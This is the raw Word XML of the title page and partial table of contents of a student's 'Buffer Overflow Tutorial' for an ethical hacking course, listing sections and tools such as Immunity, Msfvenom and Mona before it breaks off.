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3EFC2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C1B2A7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EF8DF4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2625A8F4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10A23A64" wp14:editId="3AA6D00A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3324959</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4624560" cy="0"/>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4624560" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                          <a:prstDash/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblW w:w="7283"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10" w:type="dxa"/>
                                <w:right w:w="10" w:type="dxa"/>
                              </w:tblCellMar>
                              <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
                            </w:tblPr>
                            <w:tblGrid>
                              <w:gridCol w:w="7283"/>
                            </w:tblGrid>
                            <w:tr w:rsidR="00C77908" w14:paraId="0124E1DF" w14:textId="77777777" w:rsidTr="00680500">
                              <w:trPr>
                                <w:cantSplit/>
                                <w:trHeight w:val="4958"/>
                                <w:jc w:val="center"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="7283" w:type="dxa"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                                  <w:tcMar>
                                    <w:top w:w="0" w:type="dxa"/>
                                    <w:left w:w="108" w:type="dxa"/>
                                    <w:bottom w:w="0" w:type="dxa"/>
                                    <w:right w:w="108" w:type="dxa"/>
                                  </w:tcMar>
                                  <w:vAlign w:val="center"/>
                                </w:tcPr>
                                <w:p w14:paraId="3D30536A" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:spacing w:after="0"/>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="56"/>
                                    </w:rPr>
                                    <w:t>Buffer Overflow Tutorial</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="01FCCB4D" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                                      <w:color w:val="222222"/>
                                      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                                <w:p w14:paraId="5A0FE884" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:spacing w:after="161"/>
                                    <w:ind w:right="207"/>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="40"/>
                                    </w:rPr>
                                    <w:t>Aidan Cram</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2F57FBDB" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:spacing w:after="161"/>
                                    <w:ind w:right="207"/>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:sz w:val="30"/>
                                    </w:rPr>
                                    <w:t>CMP320: Hacking 3</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5D65BA40" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:spacing w:after="161"/>
                                    <w:ind w:right="207"/>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:sz w:val="30"/>
                                    </w:rPr>
                                    <w:t>BSc Ethical Hacking Year 3</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="22A72436" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                                  <w:pPr>
                                    <w:pStyle w:val="Standard"/>
                                    <w:spacing w:after="161"/>
                                    <w:ind w:right="207"/>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:sz w:val="30"/>
                                    </w:rPr>
                                    <w:t>2020/21</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p w14:paraId="7EF9C89A" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908"/>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr vert="horz" wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" compatLnSpc="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="10A23A64" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Frame2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:261.8pt;width:364.15pt;height:0;z-index:3;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" filled="f" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblW w:w="7283"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10" w:type="dxa"/>
                          <w:right w:w="10" w:type="dxa"/>
                        </w:tblCellMar>
                        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
                      </w:tblPr>
                      <w:tblGrid>
                        <w:gridCol w:w="7283"/>
                      </w:tblGrid>
                      <w:tr w:rsidR="00C77908" w14:paraId="0124E1DF" w14:textId="77777777" w:rsidTr="00680500">
                        <w:trPr>
                          <w:cantSplit/>
                          <w:trHeight w:val="4958"/>
                          <w:jc w:val="center"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="7283" w:type="dxa"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                            <w:tcMar>
                              <w:top w:w="0" w:type="dxa"/>
                              <w:left w:w="108" w:type="dxa"/>
                              <w:bottom w:w="0" w:type="dxa"/>
                              <w:right w:w="108" w:type="dxa"/>
                            </w:tcMar>
                            <w:vAlign w:val="center"/>
                          </w:tcPr>
                          <w:p w14:paraId="3D30536A" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:after="0"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="56"/>
                              </w:rPr>
                              <w:t>Buffer Overflow Tutorial</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="01FCCB4D" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                                <w:color w:val="222222"/>
                                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5A0FE884" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:after="161"/>
                              <w:ind w:right="207"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>Aidan Cram</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2F57FBDB" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:after="161"/>
                              <w:ind w:right="207"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="30"/>
                              </w:rPr>
                              <w:t>CMP320: Hacking 3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D65BA40" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:after="161"/>
                              <w:ind w:right="207"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="30"/>
                              </w:rPr>
                              <w:t>BSc Ethical Hacking Year 3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22A72436" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:after="161"/>
                              <w:ind w:right="207"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="30"/>
                              </w:rPr>
                              <w:t>2020/21</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p w14:paraId="7EF9C89A" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF4DEB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ECE977" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC563CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0292AD0E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5005B60C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0625BA8A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7071F1E2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E595C51" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25377AF3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7488DA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB30575" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E559C8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B2264D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117406E2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B38B457" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396B35D6" w14:textId="76547639" w:rsidR="00164B2A" w:rsidRDefault="00594E47" w:rsidP="00594E47">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21487127" wp14:editId="7329B62A">
            <wp:extent cx="531495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876300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C399B13" w14:textId="0BA5BF2E" w:rsidR="00594E47" w:rsidRDefault="00594E47" w:rsidP="00594E47">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9EC470" wp14:editId="74E2DBC5">
            <wp:extent cx="3390900" cy="638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638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF112C" w14:textId="1A5ED25C" w:rsidR="00594E47" w:rsidRDefault="00AD2FFF" w:rsidP="00594E47">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="2" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A457B27" wp14:editId="76924222">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>4796280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="14760" cy="0"/>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14760" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                          <a:prstDash/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="24FFFA1D" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                            <w:pPr>
                              <w:pStyle w:val="Standard"/>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:i/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr vert="horz" wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" compatLnSpc="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1A457B27" id="Frame1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:377.65pt;width:1.15pt;height:0;z-index:2;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" stroked="f">
                <v:fill opacity="0"/>
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="24FFFA1D" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
                      <w:pPr>
                        <w:pStyle w:val="Standard"/>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:i/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Note that Information contained in this document is for educational purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B8DC1A" w14:textId="77777777" w:rsidR="00594E47" w:rsidRDefault="00594E47">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C42CD20" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Abtracttitle"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="2390"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \u \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C44679" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563994" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563994" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563994" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Introduction</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563994" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59D087EA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563995" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>1.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563995" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563995" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Background</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563995" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FFB14CB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563996" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>1.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563996" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563996" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Application</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563996" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E598217" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563997" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563997" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563997" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Tools</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563997" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AE09E18" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563998" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563998" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563998" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>Ollydebug</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563998" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="761DF494" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71563999" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563999" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563999" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>Immunity</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71563999" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="763CC740" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564000" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.3</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564000" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564000" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>Msfvenom</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564000" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14B4DB43" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564001" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564001" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564001" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>Mona</w:t>
        </w:r>
      </w:hyperlink>
